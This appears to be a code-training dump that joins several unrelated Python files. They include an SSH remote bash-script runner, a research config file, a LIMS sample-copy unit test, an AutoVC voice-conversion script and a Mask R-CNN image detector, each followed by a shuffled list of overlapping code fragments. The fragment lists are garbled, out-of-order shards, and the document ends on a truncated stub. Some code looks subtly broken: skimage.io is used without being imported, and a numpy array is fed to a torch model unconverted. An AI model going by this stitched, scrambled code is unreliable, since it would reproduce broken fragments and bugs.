"$!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command)",
"\"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename =",
"parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts,",
"60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"])",
"bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename,",
"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\"",
"&\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh <<",
"output)) e.output = output raise e return \"\".join(output_array) def _exec(self, command): transport =",
"e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs,",
"\"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport()",
"try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr =",
"bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise",
"in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" %",
"def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands =",
"command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self,",
"command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/')",
"socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial output was\\n:%s\" %",
"scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs)",
"def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20",
"'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport",
"% (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir,",
"base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e:",
"\"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\")",
"return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When running bash",
"errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process",
"output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr =",
"script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 *",
"return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"):",
"\\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close()",
"bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base"
] |
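For orientation, a minimal usage sketch of the Run plugin above, assuming a connected paramiko SSHClient supplies the transport; the host name, credentials, and commands are placeholders, not taken from the source.

import paramiko

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('example-host', username='user', password='secret')  # placeholder host/credentials

runner = Run(client)                            # Run is the class defined above
stdout = runner.script("echo hello")            # blocking; returns the captured stdout
result = runner.script_v2("uname -a")           # blocking; CompletedProcess with .stdout/.stderr
handle = runner.background_script("sleep 30")   # fire-and-forget; returns a background.Background handle

Note that script() wraps the command in a quoted heredoc, so the remote shell receives the script verbatim, and background_script() detaches via nohup while persisting the pid, output, and exit status to temp files that the Background handle can poll later.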
# config.py
DATA_PATH = "/media/jonas/Extreme SSD/research/polarisation/data/2019_12/"
ADJACENCY_MATRIX_PATH = "./intermediate_data/network_matrices/"
ID_DICT_PATH = "./intermediate_data/id_to_sub_dicts/"
EDGE_LIST_PATH = "./intermediate_data/edge_lists/"
COUNT_COL_NAME = "f0_"
MIN_COUNT_BOT_EXCLUSION = 500
SUBREDDIT_COMMENT_THRESHOLD = 500
REBUILD = False
SAVE = True
SAMPLE_DF = False
MONTH = "2019_12"
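The flags above read like switches for an expensive data-preparation pipeline. A minimal sketch of how such a module is commonly consumed; load_edge_list, the ".csv" naming, the pandas usage, and the sample fraction are all assumptions for illustration, not taken from the source.

import os
import pandas as pd  # assumption: edge lists are materialised as DataFrames
import config

def load_edge_list(build_edge_list):
    """Rebuild the edge list when config.REBUILD is set, else reuse the cached copy."""
    path = os.path.join(config.EDGE_LIST_PATH, config.MONTH + ".csv")  # hypothetical file naming
    if config.REBUILD or not os.path.exists(path):
        df = build_edge_list()
        if config.SAVE:
            df.to_csv(path, index=False)
    else:
        df = pd.read_csv(path)
    if config.SAMPLE_DF:
        df = df.sample(frac=0.01)  # hypothetical fraction for quick iteration
    return df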
from builtins import sorted
from itertools import cycle
from unittest.mock import patch, Mock
from pyclarity_lims.entities import Sample
from scripts.copy_samples import Container
from scripts.copy_samples import CopySamples
from tests.test_common import TestEPP, FakeEntitiesMaker


class TestCopySamples(TestEPP):
    mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}]))
    patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage',
                                       return_value=Mock(uri='a_uri', step=mocked_step))
    patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True)

    @staticmethod
    def get_patch_create_container(container):
        return patch.object(Container, 'create', return_value=container)

    def setUp(self):
        self.epp = CopySamples(self.default_argv)
        self.fem_params = {
            'nb_input': 2,
            'project_name': 'X99999',
            'process_id': '99-9999',
            'input_container_name': 'X99999P001',
            'sample_name': cycle(['X99999P001A01', 'X99999P001B01']),
            'sample_udfs': {
                'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']),
                'Coverage (X)': cycle([30, 60]),
                'Required Yield (Gb)': cycle([120, 240]),
                'Delivery': cycle(['merged', 'split']),
                'Analysis Type': cycle(['Variant Calling gatk', 'None']),
                'Rapid Analysis': cycle(['No', 'Yes']),
                'User Prepared Library': cycle(['No', 'Yes']),
                'Species': cycle(['Homo sapiens', 'Mus musculus']),
                'Genome Version': cycle(['hg38', 'hg19']),
            },
            'step_udfs': {'Container Type': '96 well plate'},
            'output_per_input': 0,
        }

    def test_copy_samples(self):
        fem = FakeEntitiesMaker()
        self.epp.lims = fem.lims
        self.epp.process = fem.create_a_fake_process(**self.fem_params)
        self.epp.lims.get_containers = Mock(return_value=[])
        self.workflow_stage = Mock(uri='a_uri')
        self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step)
        with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \
                self.patched_get_workflow_stage as pws, self.patch_Step_create as psc:
            self.epp._run()
            expected_create_samples_list = [
                {'container': fem.object_store_per_type['Container'][1],
                 'project': fem.object_store_per_type['Project'][0],
                 'name': 'X99999P002A01',
                 'position': 'A:1',
                 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep',
                         'Coverage (X)': 30,
                         'Required Yield (Gb)': 120,
                         'Delivery': 'merged',
                         'User Prepared Library': 'No',
                         'Analysis Type': 'Variant Calling gatk',
                         'Rapid Analysis': 'No',
                         'Species': 'Homo sapiens',
                         'Genome Version': 'hg38'}},
                {'container': fem.object_store_per_type['Container'][1],
                 'project': fem.object_store_per_type['Project'][0],
                 'name': 'X99999P002B01',
                 'position': 'B:1',
                 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep',
                         'Coverage (X)': 60,
                         'Required Yield (Gb)': 240,
                         'Delivery': 'split',
                         'Analysis Type': 'None',
                         'User Prepared Library': 'Yes',
                         'Rapid Analysis': 'Yes',
                         'Species': 'Mus musculus',
                         'Genome Version': 'hg19'}},
            ]
            self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list)
            pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST')
            pws.assert_any_call(self.epp.lims, "Remove From Processing EG 1.0 WF",
                                "Remove From Processing EG 1.0 ST")

            # test step creation
            inputs_project_step_creation = []
            inputs_project_step_creation_dict = {
                self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact,
                self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact}
            for input in sorted(inputs_project_step_creation_dict):
                inputs_project_step_creation.append(inputs_project_step_creation_dict[input])
            psc.assert_called_with(
                self.epp.lims,
                inputs=inputs_project_step_creation,
                protocol_step=self.mocked_step,
                container_type_name='Tube'
            )
"= fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with",
"fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep',",
"Library': 'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens',",
"Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged',",
"self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01',",
"'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims",
"self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input]) psc.assert_called_with( self.epp.lims, inputs=inputs_project_step_creation, protocol_step=self.mocked_step,",
"'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG",
"from builtins import sorted from itertools import cycle from unittest.mock import patch, Mock",
"'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens',",
"cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User",
"= patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container,",
"Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)': 120, 'Delivery': 'merged',",
"From Processing EG 1.0 WF\", \"Remove From Processing EG 1.0 ST\") # test",
"'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1],",
"Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project':",
"{'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)':",
"import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri',",
"From Processing EG 1.0 ST\") # test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict",
"class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch =",
"cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome",
"(X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type':",
"Sample from scripts.copy_samples import Container from scripts.copy_samples import CopySamples from tests.test_common import TestEPP,",
"from pyclarity_lims.entities import Sample from scripts.copy_samples import Container from scripts.copy_samples import CopySamples from",
"60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared Library':",
"'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': {",
"musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create",
"= Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage",
"Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38',",
"30, 'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis Type':",
"scripts.copy_samples import Container from scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class",
"'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required",
"240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No',",
"Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No',",
"0, 'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process",
"Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG",
"expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From",
"'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']),",
"'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield",
"fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage",
"'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage",
"self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\",
"'99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params)",
"sorted from itertools import cycle from unittest.mock import patch, Mock from pyclarity_lims.entities import",
"'hg19']), }, 'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999' }",
"cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']),",
"DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery':",
"cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs':",
"from scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step =",
"'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free",
"DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis",
"step creation inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for",
"self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project':",
"Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield"
] |
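A note on the cycled UDFs above: the test relies on FakeEntitiesMaker drawing one value from each cycle per input sample, which is why the first expected sample carries 30 / 120 / 'merged' / 'Variant Calling gatk' and the second 60 / 240 / 'split' / 'None'. A minimal sketch of that distribution, independent of the test harness (the udf_cycles subset and the two-sample count are illustrative, not part of the suite):

from itertools import cycle

# Illustrative subset of the cycled UDFs used in fem_params above.
udf_cycles = {
    'Coverage (X)': cycle([30, 60]),
    'Delivery': cycle(['merged', 'split']),
}
# One draw from every cycle per sample: sample 0 gets the first value of
# each cycle, sample 1 the second -- matching expected_create_samples_list.
samples = [{name: next(values) for name, values in udf_cycles.items()}
           for _ in range(2)]
print(samples)
# [{'Coverage (X)': 30, 'Delivery': 'merged'},
#  {'Coverage (X)': 60, 'Delivery': 'split'}]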
#!/usr/bin/env python
# coding: utf-8

# In[ ]:

# from resemblyzer import preprocess_wav, VoiceEncoder  # Style encoder
import os
import pickle

import torch
import numpy as np

import data_loader.dataLoader as datas
from math import ceil
from model_vc import Generator

device = 'cpu'
G = Generator(32, 256, 512, 32).eval().to(device)
g_checkpoint = torch.load('train_weights.ckpt', map_location=torch.device('cpu'))  # AutoVC model weights
G.load_state_dict(g_checkpoint['model'])

data = datas.voiceDataset()
metadata = [data[0]]

spect_vc = []
for sbmt_i in metadata:
    x_org = sbmt_i['spectrogram']
    uttr_org = x_org
    emb_org = sbmt_i['style'][np.newaxis, :]
    for sbmt_j in metadata:
        emb_trg = sbmt_j['style'][np.newaxis, :]
        tmp = np.zeros((256), dtype='float64')
        tmp[0] = 1
        with torch.no_grad():
            _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg)
        uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy()
        spect_vc.append(('{}x{}'.format(sbmt_i['person'], sbmt_j['person']), uttr_trg))

with open('results.pkl', 'wb') as handle:
    pickle.dump(spect_vc, handle)
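The script above only pickles the converted spectrograms; turning them into audio is a separate step. A minimal sketch of consuming results.pkl as written by the loop above — my_vocoder is a placeholder, not an API of this repository (AutoVC's own conversion code feeds these mels to a WaveNet vocoder):

import pickle

# Load the (name, spectrogram) pairs written by the conversion loop above.
with open('results.pkl', 'rb') as handle:
    spect_vc = pickle.load(handle)

for name, mel in spect_vc:
    print(name, mel.shape)  # e.g. 'p001xp002' and a (n_frames, n_mels) array
    # waveform = my_vocoder(mel)  # hypothetical vocoder call; swap in the
    #                             # vocoder of your choice to synthesise audio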
#
# Object detector (by sequential file read from directory)
#
import os
import sys
import random
import math
import re
import time
import numpy as np
import tensorflow as tf
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from glob import glob
import argparse
import skimage.io
import shutil

# Root directory of the project
ROOT_DIR = os.path.abspath("../../")

# Import Mask RCNN
sys.path.append(ROOT_DIR)  # To find local version of the library
from mrcnn import utils
from mrcnn import visualize
from mrcnn.visualize import display_images
import mrcnn.model as modellib
from mrcnn.model import log
# from samples.cats_dogs import cats_dogs
from samples.miyukiCamera import miyukiCamera

# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")


def process():
    class InferenceConfig(miyukiCamera.MiyukiCameraConfig):
        # Set batch size to 1 since we'll be running inference on
        # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
        GPU_COUNT = 1
        IMAGES_PER_GPU = 1

    config = InferenceConfig()
    # config.display()

    # Device to load the neural network on.
    # Useful if you're training a model on the same
    # machine, in which case use CPU and leave the
    # GPU for training.
    DEVICE = "/gpu:0"  # /cpu:0 or /gpu:0

    # Inspect the model in training or inference modes
    # values: 'inference' or 'training'
    # TODO: code for 'training' test mode not ready yet
    TEST_MODE = "inference"

    # set model
    # Create model in inference mode
    with tf.device(DEVICE):
        model = modellib.MaskRCNN(mode="inference", config=config, model_dir=MODEL_DIR)

    # Or, load the last model you trained
    weights_path = model.find_last()

    # Load weights
    print("Loading weights ", weights_path)
    model.load_weights(weights_path, by_name=True)
    return model, config


def detector(model, config, dataset, DATA_DIR):
    MRCNN_DATA_DIR = "/".join(DATA_DIR.split('/')[:-1])
    MRCNN_DATA_DIR = os.path.join(MRCNN_DATA_DIR, "mrcnn_image")
    print(MRCNN_DATA_DIR)
    images = glob(os.path.join(DATA_DIR, "*.jpg"))
    print("* total length of images : ", len(images))
    for f in images:
        print("Running on {}".format(f))
        # Read image
        image = skimage.io.imread(f)
        # Detect objects
        results = model.detect([image], verbose=1)
        r = results[0]
        print("- " * 40)
        print("Scores --> ", r['scores'])
        print("found Class Names --> ", [dataset.class_info[i]["name"] for i in r['class_ids']])
        classes = [dataset.class_info[i]["name"] for i in r['class_ids']]
        if "prescription" in classes:
            print("found prescription on %s" % f.split("/")[-1])
            image_file = f.split("/")[-1]
            shutil.copy(f, os.path.join(MRCNN_DATA_DIR, image_file))


def main():
    # Parse command line arguments
    parser = argparse.ArgumentParser(description='Sequential Reading File Object Detector.')
    parser.add_argument('--dataset', required=True,
                        metavar="/path/to/balloon/dataset",
                        help='Directory of the target dataset to detect')
    args = parser.parse_args()
    assert args.dataset, \
        "Provide --dataset directory to apply detector"
    model, config = process()
    dataset = miyukiCamera.MiyukiCameraDataset()
    DATA_DIR = args.dataset
    detector(model, config, dataset, DATA_DIR)


if __name__ == "__main__":
    main()
"from samples.miyukiCamera import miyukiCamera # Directory to save logs and trained model MODEL_DIR",
"images: print(\"Running on {}\".format(f)) # Read image image = skimage.io.imread(f) # Detect objects",
"= 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() # Device to load",
"to detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide --image directory to apply",
"= os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of",
"numpy as np import tensorflow as tf import matplotlib import matplotlib.pyplot as plt",
"r = results[0] print(\"- \" * 40 ) print(\"Scores --> \", r['scores']) print(\"found",
"MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images =",
"matplotlib.pyplot as plt import matplotlib.patches as patches from glob import glob import argparse",
"# Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library",
"target dataset to detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide --image directory",
"import matplotlib.patches as patches from glob import glob import argparse import skimage import",
"line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\",",
"of images : \", len(images) ) for f in images: print(\"Running on {}\".format(f))",
"\"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images",
"Root directory of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR)",
"the last model you trained weights_path = model.find_last() # Load weights print(\"Loading weights",
") ) def main(): # Parse command line arguments parser = argparse.ArgumentParser( description='Sequential",
"import mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs from",
"GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() # Device to",
"inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the",
"to 1 since we'll be running inference on # one image at a",
"math import re import time import numpy as np import tensorflow as tf",
"a model on the same # machine, in which case use CPU and",
"glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images : \", len(images) )",
"trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch",
"[dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in classes: print(\"found prescription on %s\"",
"import time import numpy as np import tensorflow as tf import matplotlib import",
"display_images import mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs",
"File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect')",
"command line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True,",
"print(\"Scores --> \", r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in",
"* IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() #",
"argparse import skimage import shutil # Root directory of the project ROOT_DIR =",
"directory of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) #",
"from mrcnn import visualize from mrcnn.visualize import display_images import mrcnn.model as modellib from",
"= 1 config = InferenceConfig() #config.display() # Device to load the neural network",
"total length of images : \", len(images) ) for f in images: print(\"Running",
"np import tensorflow as tf import matplotlib import matplotlib.pyplot as plt import matplotlib.patches",
"results = model.detect([image], verbose=1) r = results[0] print(\"- \" * 40 ) print(\"Scores",
"r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes",
"modes # values: 'inference' or 'training' # TODO: code for 'training' test mode",
"r['class_ids']] if \"prescription\" in classes: print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file =",
"print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes =",
"process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1 since we'll be running",
"network on. # Useful if you're training a model on the same #",
"of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To",
"on # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU",
"MRCNN_DATA_DIR, image_file ) ) def main(): # Parse command line arguments parser =",
"modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera",
"main(): # Parse command line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object",
"metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect') args = parser.parse_args() assert args.dataset",
"mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera",
"model, config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset,",
"classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in classes: print(\"found prescription",
"to load the neural network on. # Useful if you're training a model",
"'training' # TODO: code for 'training' test mode not ready yet TEST_MODE =",
"or inference modes # values: 'inference' or 'training' # TODO: code for 'training'",
"#from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera # Directory to save logs",
"in training or inference modes # values: 'inference' or 'training' # TODO: code"
] |
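Since the per-image logic above boils down to mapping r['class_ids'] through dataset.class_info and checking for "prescription", here is a minimal, self-contained sketch of that step with a score threshold added. The helper name, the threshold, and the sample data are illustrative assumptions, not part of the original script:

# Hypothetical helper: reduce a Mask R-CNN result dict to the set of
# confidently-detected class names before the "prescription" check.
def confident_class_names(result, class_info, min_score=0.9):
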